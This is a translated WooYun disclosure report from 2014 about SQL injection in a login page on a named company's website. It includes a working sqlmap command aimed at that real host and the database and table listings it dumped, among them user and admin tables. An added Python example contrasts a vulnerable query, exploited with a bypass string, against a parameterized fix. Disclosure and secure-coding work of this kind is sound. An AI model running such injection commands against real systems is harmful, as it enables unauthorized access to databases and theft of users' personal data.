Vulnerability summary

Defect ID: wooyun-2014-082174

Title: Mengniu Group high-risk SQL injection

Vendor: mengniu.com.cn

Author: 黑暗游侠

Submitted: 2014-11-06 10:36

Fixed: 2014-12-21 10:40

Published: 2014-12-21 10:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-11-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Mengniu Group high-risk SQL injection

Detailed description:

Mengniu Group high-risk SQL injection

Proof of vulnerability:

sqlmap -u "http://happiness.mengniu.com.cn/admin/app/login.php" --data="button=1&password=123&username=*" --dbs


Database: newyear2013
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `2012mengniu_gohome_hotline` | 293214 |
| `2012mengniu_gohome` | 89008 |
| `2012mengniu_nogohome_letter` | 57566 |
| `2012mengniu_jiaozi` | 19521 |
| `2014sdn_question` | 10701 |
| `2012mengniu_gohome_keyword` | 8092 |
| `2014sdn_answer` | 2254 |
| `2012mengniu_gohome_showhappy` | 1492 |
| `2012mengniu_city` | 572 |
| `2012mengniu_regdinner` | 54 |
| `2012mengniu_gohome_gettoprovince` | 34 |
| `2012mengniu_gohome_leavecity` | 34 |
| `2012mengniu_nogohome_gettocity` | 34 |
| `2012mengniu_peoplenum` | 5 |
| admin_user | 1 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| harvard_district | 3511 |
| harvard_area | 3131 |
| harvard_users | 651 |
| harvard_city | 345 |
| harvard_coin_history | 64 |
| harvard_province | 34 |
| harvard_winner | 23 |
| harvard_game_history | 19 |
| harvard_baby_audio | 13 |
| harvard_support_history | 12 |
| harvard_talk_history | 9 |
| harvard_baby_pic | 8 |
| harvard_baby_txt | 8 |
| harvard_baby_video | 7 |
| harvard_game | 4 |
| harvard_exchange_history | 3 |
| harvard_weeks | 3 |
| harvard_ex_history | 2 |
| harvard_access_token | 1 |
| harvard_share_history | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 432 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 64 |
| TABLES | 52 |
| CHARACTER_SETS | 36 |
| KEY_COLUMN_USAGE | 36 |
| TABLE_CONSTRAINTS | 36 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Fix recommendation:

Filter input.

Copyright notice: when reposting, credit the source: 黑暗游侠@乌云
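As an added example that is not part of the original report, the following Python/sqlite3 stand-in for the login.php credential check shows the string-concatenated query that makes the username field injectable beside a parameterized version, which is the standard fix rather than input filtering alone. The schema, the password value and the in-memory database are assumptions; only the table name `admin_user` is taken from the sqlmap listing above.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the application's credential table.
    # Column names and the stored credential are hypothetical.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin_user VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    # The query is assembled by string formatting, so a quote in the
    # username changes the SQL syntax instead of being treated as data.
    # This is the pattern sqlmap detected on the username parameter.
    sql = ("SELECT COUNT(*) FROM admin_user WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    # Parameterized query: placeholders are bound by the driver, so the
    # same input is compared literally and cannot alter the statement.
    sql = ("SELECT COUNT(*) FROM admin_user "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    # A username containing a quote and a comment marker authenticates
    # against the concatenated query but is rejected by the bound one.
    probe = "admin' -- "
    print("vulnerable:", login_vulnerable(make_db(), probe, "wrong"))  # True
    print("fixed:     ", login_fixed(make_db(), probe, "wrong"))       # False
```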


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 4 (WooYun assessment)